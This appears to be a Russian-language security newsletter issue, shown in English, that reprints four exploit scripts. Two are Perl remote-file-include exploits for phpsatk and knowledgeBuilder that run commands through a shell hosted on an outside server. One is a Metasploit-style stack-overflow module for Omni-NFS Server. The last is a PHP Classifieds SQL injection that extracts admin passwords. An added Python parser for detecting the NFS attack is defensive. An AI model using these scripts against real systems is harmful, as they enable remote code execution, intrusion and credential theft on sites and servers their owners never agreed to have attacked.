
Computer for Advanced Users. Security issue: Exploits.

In this issue: phpsatk | knowledgeBuilder | Omni-NFS Server | PHP Classifieds
Software: phpsatk1

dos.py:
#!/usr/bin/perl
# phpsatk =>  Remote File Include Vulnerability
# Script.............. :phpsatk
# Discovered By.... : Root3r_H3ll
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory : http://Www.PersainFox.com
# We ArE : Root3r_H3LL & Arash.Rj
# ;

# Added for this listing: the modules the script calls but never loads.
use LWP::UserAgent;
use HTTP::Request;

# As published, the script never assigns $target, $file, $shellsite or
# $shellcmd from @ARGV and never calls usage(), so it does not run as shown.
while ($cmd !~ "exit")
{
    $xpl = LWP::UserAgent->new() or die;
    $req = HTTP::Request->new(GET => $target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
        or die("\n\n Failed to connect.");
    $res = $xpl->request($req);
    $r = $res->content;
    $r =~ tr/[\n]/[ê]/;    # replace newlines in the response before printing

    if ($ARGV[4] eq "-r")
    {
        print $r;
    }
    elsif ($ARGV[5] eq "-p")
    {
        # if not working change cmd variable to null and apply patch manually.
        $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> loader.php";
        print q
        {
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!                                Patch Applied                              !!
!! Code added to loader.php:                                                 !!
!! if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))                  !!
!!    die();                                                                 !!
!!                                                                           !!
!! NOTE: Adding patch function has not been tested. If does not compile or   !!
!! there is an error, simply make cmd = null and add the patch code to       !!
!! loader.php                                                                !!
!!                                                                           !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
        }
    }
    else
    {
        print "[cmd]\$";
        $cmd = <STDIN>;
    }
}

sub header()
{
    print q
    {
.................................................................
...                                                            ..
...           phpsatk<=  Remote File Include  Exploit          ..
...                                                            ..
.................................................................
...                                                            ..
...              PerSiaNFox NetWork Security TeaM              ..
...              Discovered By : Root3r_H3ll                   ..
...                                                            ..
.................................................................
..                                                            ..
...                    Www.PerSiaNFox.coM                      ..
..                                                            ..
.................................................................

                   </\/\\/_ 10\/3 15 1|)\4/\/
    };
}

sub usage()
{
    header();
    print q
    {
                ..............................
                            Usage

perl Root3r.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
<Target Website> - Path to target eg: www.SiteName.com
<Shell Location> - Path to shell eg: www.Sh3llserver.com/sh3ll.txt
<CMD Variable> - Shell command variable name eg: cmd
<r> - Show output from shell
<p> - Patch loader.php
                           Example

perl Root3r.pl http://SiteName http://Sh3llserver/sh3ll.txt cmd -r -p


    };
    exit();
}

Software: knowledgeBuilder
Version: 2.2

rf.perl:
#!/usr/bin/perl
#
# knowledgeBuilder v.2.2.php.NuLL-WDYL=>  Remote File Include Vulnerability
# Script.............. :knowledgebuilder php.NuLL WDYL
# Discovered By.... : IGI
# Expl0iter ........ : Root3r_H3LL
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory :http://www.Virangar.org & http://Www.PersainFox.com
# ;

# Added for this listing: the modules the script calls but never loads.
use LWP::UserAgent;
use HTTP::Request;

# As published, the script never assigns $target, $file, $shellsite or
# $shellcmd from @ARGV and never calls usage(), so it does not run as shown.
while ($cmd !~ "exit")
{
    $xpl = LWP::UserAgent->new() or die;
    $req = HTTP::Request->new(GET => $target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
        or die("\n\n Failed to connect.");
    $res = $xpl->request($req);
    $r = $res->content;
    $r =~ tr/[\n]/[ê]/;    # replace newlines in the response before printing

    if ($ARGV[4] eq "-r")
    {
        print $r;
    }
    elsif ($ARGV[5] eq "-p")
    {
        # if not working change cmd variable to null and apply patch manually.
        $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> visEdit_control.class.php";
        print q
        {
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!                                Patch Applied                              !!
!! Code added to visEdit_control.class.php:                                  !!
!! if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))                  !!
!!    die();                                                                 !!
!!                                                                           !!
!! NOTE: Adding patch function has not been tested. If does not compile or   !!
!! there is an error, simply make cmd = null and add the patch code to       !!
!! visEdit_control.class.php                                                 !!
!!                                                                           !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
        }
    }
    else
    {
        print "[cmd]\$";
        $cmd = <STDIN>;
    }
}

sub header()
{
    print q
    {
.................................................................
...                                                            ..
...     knowledgebuilder <=  Remote File Include  Exploit      ..
..                                                            ..
................................................................
...                Virangar Under Ground TeaM                   ..
...                           AND                              ..
...              PerSiaNFox NetWork Security TeaM              ..
...                  Discovered By : IGI                       ..
...                 ExPl0iter : Root3r_H3LL                    ..
.................................................................
...                     Www.Virangar.OrG                       ..
...                    Www.PerSiaNFox.coM                      ..
...                     Www.Virangar.NeT                       ..
.................................................................

                   </\/\\/_ 10\/3 15 1|)\4/\/
    };
}

sub usage()
{
    header();
    print q
    {
                ..............................
                            Usage

perl Expl0it.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
<Target Website> - Path to target eg: www.SiteName.com
<Shell Location> - Path to shell eg: www.Sh3llserver.com/sh3ll.txt
<CMD Variable> - Shell command variable name eg: cmd
<r> - Show output from shell
<p> - Patch visEdit_control.class.php
                           Example

perl Expl0it.pl http://SiteName http://Sh3llserver/sh3ll.txt cmd -r -p


    };
    exit();
}

Software: Omni-NFS Server
Version: 4.2

vd_xlink.pm:
# vd_xlink.pm
#
# The exploit is a part of VulnDisco Pack - use only under the license agreement
# specified in LICENSE.txt in your VulnDisco distribution

# VULNDISCO LICENSE

# Purchaser buys VulnDisco Pack ("the Pack") and receives the right to use it
# under the terms of the following License.

# The Pack with all the data and software contained in it is the private
# property of GLEG ltd. Company ("the Company"). The Company is the only
# entity who has exclusive rights to the Pack. The Pack with all the
# software and data containing in it is the intellectual property of the
# Company and is guarded by intellectual property laws.

# Purchaser has the rights to use the Pack only under the terms and
# conditions of this License to the maximum extent permitted by applicable
# law.
# Purchaser has the rights to use the Pack only for his own needs or for
# the needs of his company if the License is purchased by the company. For
# the means of this License by purchaser's company those people are meant
# who directly works for the company which owns the License.
# Purchaser is granted nonexclusive, non-transferable rights to use the
# Pack.

# Purchaser is allowed to install the Pack on unlimited number of seats.

# Purchaser is not restricted to use the Pack to test the particular IP
# range.

# Purchaser is not allowed to disclose the Pack in whole or partly, to
# disclose any information concerning the Pack or any information derived
# from the Pack. Purchaser is not allowed to transfer the Pack or any data
# concerning it (including derived data), anyhow or by any means to third
# party entities. Purchaser is not allowed to sell or redistribute or
# otherwise transfer the rights to the Pack unless otherwise is expressly
# stated in writing by the Company.

# Purchaser realizes that the Pack is provided as-is without warranty of
# any kind, including warranties that the Pack suits particular needs, is
# safe to use, or contain no issues.

# Purchaser realizes that the Pack contains potentially dangerous
# information which being improper used or misused can cause damage to
# Purchaser or to Purchaser's company or to third party organizations and
# individuals.

# The Company is not responsible for any losses to purchaser or to
# purchaser's company resulted from Purchaser's proper or improper use or
# inability to use the Pack, including but not limited to loss of
# information, damages to computers or to network infrastructure. The
# Company is not responsible for any losses to any third party
# organizations or individuals resulted from Purchaser's intentional or
# accidental use or misuse of the Pack. The Company is not responsible for
# any consequences of Purchaser's disclosure of the Pack.

# Purchaser realizes that he is solely responsible for any claims
# resulted from Purchaser's acquisition, use or misuse of the Pack and
# agrees to defend Company from mentioned claims at own cost.

# Purchaser agrees to take all necessary measures to not allow
# disclosure of the Pack, to use it only under the terms of this License
# and applicable law. Purchaser has been informed and agrees that in case
# of Purchaser's breach of any provisions of this License the Company has
# right to take appropriate measures including legal prosecution.

# All information that is provided for Purchaser by the Company,
# including Pack updates and support information, is provided under the
# same terms as in the Pack License. As for newer versions of the Pack,
# the Company reserves the right to issue new License with them.

# This License is designed in accordance with the laws of Russian
# Federation.
# License terms are governed by the laws of Russian Federation. Unless
# otherwise is agreed in writing, all disputes relating to this License
# shall be subject to final and binding arbitration in Russia, Moscow.

# Purchaser has been informed and agrees that after installation of the
# Pack this Agreement is considered as signed and came into force as
# Agreement between the Company and Purchaser.

# Purchaser has read and understood this License, and agrees to its
# terms and conditions.

use strict;

package Msf::Exploit::vd_xlink;
use base "Msf::Exploit";
use Pex::Text;
use Msf::Socket::Tcp;   # added for this listing: used below but not loaded in the published module

my $advanced = { };

my $info =
{
    "Name"      => "[0day] Omni-NFS Server overflow",
    "Version"   => "\$Revision: 1.0 \$",
    "Authors"   => ["Evgeny Legerov"],
    "Arch"      => ["x86"],
    "OS"        => ["win32"],
    "Priv"      => 1,
    "UserOpts"  =>
    {
        "RHOST" => [1, "ADDR", "The target address"],
        "RPORT" => [1, "PORT", "The target port", 2049],
    },

    "Description" => Pex::Text::Freeform(q{
        Exploit for Omni-NFS Server stack overflow vulnerability.
    }),

    "Payload" =>
    {
        "Space"     => 427,
    },

    "DefaultTarget"  => 0,
    "Targets"        =>
    [
        ["Omni-NFS Server 5.2 (nfsd.exe: call ebx) / Windows 2000 SP4", 0x00401843]
    ],

    "Keys"           => ["vd_xlink"],
};

sub new {
    my $class = shift;
    return $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_);
}

sub Exploit {
    my $self = shift;
    my $host = $self->GetVar("RHOST");
    my $port = $self->GetVar("RPORT");
    my $writedir = $self->GetVar("DIR");
    my $bind_port = $self->GetVar("LPORT");
    my $target = $self->Targets->[$self->GetVar("TARGET")];
    my $encodedPayload = $self->GetVar("EncodedPayload");
    my $shellcode   = $encodedPayload->Payload;

    # 800-byte buffer that is split across the two opaque_auth bodies below
    my $payload = "";
    $payload .= "\x4d" x 9;
    $payload .= $shellcode;
    $payload .= "\x4d" x (427 - length($shellcode));
    $payload .= "\x4d\x4d\x4d\x2d";
    $payload .= pack("V", $target->[1]);
    $payload .= "\xe9\x17\xfb\xff\xff"; # jmp $-1257
    $payload .= "\x45" x 351;

    # ONC RPC call header: xid, msg_type CALL, RPC version 2,
    # program 100005 (mountd), program version 1, procedure 1 (MNT)
    my $s = "";
    $s .= pack("N", 1);
    $s .= pack("N", 0);
    $s .= pack("N", 2);
    $s .= pack("N", 100005);
    $s .= pack("N", 1);
    $s .= pack("N", 1);

    # credential: flavor 1 (AUTH_UNIX), 400-byte opaque body = first half of the buffer
    $s .= pack("N", 1);
    $s .= pack("N", 400);
    $s .= substr($payload, 0, 400);

    # verifier: flavor 1, 400-byte opaque body = second half of the buffer
    $s .= pack("N", 1);
    $s .= pack("N", 400);
    $s .= substr($payload, 400);

    # TCP record mark: last-fragment bit plus fragment length
    my $req = pack("N", length($s) | 0x80000000) . $s;

    my $sock = Msf::Socket::Tcp->new("PeerAddr" => $host, "PeerPort" => $port);
    if ($sock->IsError) {
        $self->PrintLine("Error creating socket: " . $sock->GetError);
        return;
    }

    $sock->Send($req);

    sleep(3);

    $sock->Close();
}
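The request that vd_xlink.pm sends is a TCP record-marked ONC RPC CALL to mountd (program 100005) whose AUTH_UNIX credential and verifier bodies carry the 800-byte buffer. As an added example, not part of the newsletter or of the VulnDisco module, the following Python decodes such a call and reports the structural anomalies a detector or a hardened RPC parser can key on (a machinename length that cannot be valid, a non-empty verifier on an AUTH_SYS call); the sample messages are constructed here and contain only filler.

```python
import struct

MOUNTPROG = 100005           # ONC RPC program number of mountd, as packed in vd_xlink.pm
AUTH_NONE, AUTH_SYS = 0, 1   # opaque_auth flavors (RFC 5531); AUTH_SYS is the old AUTH_UNIX
MAX_AUTH_BODY = 400          # opaque_auth body<400> limit (RFC 5531)
MAX_MACHINENAME = 255        # AUTH_SYS machinename<255> limit (RFC 5531)

def check_auth_sys(body):
    """Structural checks on an AUTH_SYS credential body: stamp, then machinename."""
    if len(body) < 8:
        return ["AUTH_SYS cred shorter than stamp + machinename length"]
    name_len = struct.unpack(">I", body[4:8])[0]
    if name_len > MAX_MACHINENAME or 8 + name_len > len(body):
        return ["AUTH_SYS machinename length %d is invalid" % name_len]
    return []

def parse_rpc_call(record):
    """Decode one TCP record-marked ONC RPC CALL; return (fields, findings)."""
    fields, findings = {}, []
    if len(record) < 4:
        return fields, ["truncated record mark"]
    mark = struct.unpack(">I", record[:4])[0]
    fields["last_fragment"] = bool(mark & 0x80000000)   # high bit: last fragment
    body = record[4:4 + (mark & 0x7FFFFFFF)]            # low 31 bits: fragment length
    if len(body) < 24:
        return fields, ["fragment shorter than the call header"]
    (fields["xid"], fields["msg_type"], fields["rpcvers"], fields["prog"],
     fields["vers"], fields["proc"]) = struct.unpack(">6I", body[:24])
    off = 24
    for part in ("cred", "verf"):                        # two opaque_auth structures follow
        if len(body) < off + 8:
            return fields, findings + ["truncated %s" % part]
        flavor, length = struct.unpack(">II", body[off:off + 8])
        opaque = body[off + 8:off + 8 + length]
        fields[part] = (flavor, length)
        if length > MAX_AUTH_BODY or len(opaque) < length:
            findings.append("%s body length %d exceeds limit or data" % (part, length))
        elif part == "cred" and flavor == AUTH_SYS:
            findings += check_auth_sys(opaque)
        if part == "verf" and (flavor != AUTH_NONE or length != 0):
            findings.append("verifier flavor %d length %d, expected AUTH_NONE" % (flavor, length))
        off += 8 + length
    return fields, findings

def rpc_call(prog, vers, proc, cred, verf, xid=1):
    # Build a record-marked CALL the way vd_xlink.pm packs it (only used for the samples).
    s = struct.pack(">6I", xid, 0, 2, prog, vers, proc)  # xid, CALL, RPC v2, prog, vers, proc
    for flavor, opaque in (cred, verf):
        s += struct.pack(">II", flavor, len(opaque)) + opaque
    return struct.pack(">I", len(s) | 0x80000000) + s      # last-fragment bit | length

# Constructed samples: a well-formed AUTH_SYS MNT call, and one with the exploit's two 400-byte bodies.
GOOD_CRED = struct.pack(">II", 0, 4) + b"host" + struct.pack(">III", 0, 0, 0)
GOOD_CALL = rpc_call(MOUNTPROG, 1, 1, (AUTH_SYS, GOOD_CRED), (AUTH_NONE, b""))
BAD_CALL = rpc_call(MOUNTPROG, 1, 1, (AUTH_SYS, b"M" * 400), (AUTH_SYS, b"M" * 400))
```

The 400-byte bodies sit exactly at the RFC limit, so a length check alone passes them; it is the impossible machinename length and the non-empty AUTH_SYS verifier that give the message away.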

Software: PHP Classifieds
Version: 7.1

Php_Classifieds_expl.pl:
#!/usr/bin/perl
#[Script Name: Php Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
use IO::Socket;
if(@ARGV < 3){
    print "
[========================================================================
[//  Php Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit
[//           Usage: class.pl [target] [path] [userid]
[//                   Example: class.pl victim.com / 1
[//                   Example: class.pl victim.com /path/ 1
[//                           Vuln&Exp : ajann
[========================================================================
";
    exit();
}
#Local variables
$classifiedsserver = $ARGV[0];
$classifiedsserver =~ s/(http:\/\/)//eg;
$classifiedshost = "http://".$classifiedsserver;
$classifiedsport = "80";
$classifiedsdir = $ARGV[1];
$classifiedsfile = "detail.php?id=1009&contact=1&user_id=";
$classifiedsend = "member_login.php";
$classifiedstarget = "1%20union%20select%20concat(adm_name,char(32),adm_pass)%20from%20phpclass_admins%20where%20adm_id%20like%20".$ARGV[2];
$classifiedstarget = $classifiedshost.$classifiedsdir.$classifiedsfile.$classifiedstarget;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $classifiedsserver\n";
$classifieds = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$classifiedsserver", PeerPort => "$classifiedsport") || die "\n+ Connection failed...\n";
print $classifieds "GET $classifiedstarget\n";
print $classifieds "Host: $classifiedsserver\n";
print $classifieds "Accept: */*\n";
print $classifieds "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$classifieds>) {
    if ($answer =~ /(.*?)<\/b>/){
        print "+ Exploit succeed! Getting admin information.\n";
        print "+ ---------------- +\n";
        print "+ Username and Password: $1\n";
        print "+ Lets go $classifiedshost$classifiedsdir$classifiedsend and\n+ Login with this information. \n";
        exit();
    }

    if ($answer =~ /Ad removed or not yet approved/) {
        print "+ Exploit Failed : ( \n";
        print "+**********************************************************************+\n";
        exit();
    }

    if ($answer =~ /Internal Server Error/) {
        print "+ Exploit Failed : (  \n";
        print "+**********************************************************************+\n";
        exit();
    }
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
The newsletter is produced and maintained with the support of the Perm Krai Information Network.
You can reach me at: ICQ - 273214003

e-mail - isdmi1::mail.ru
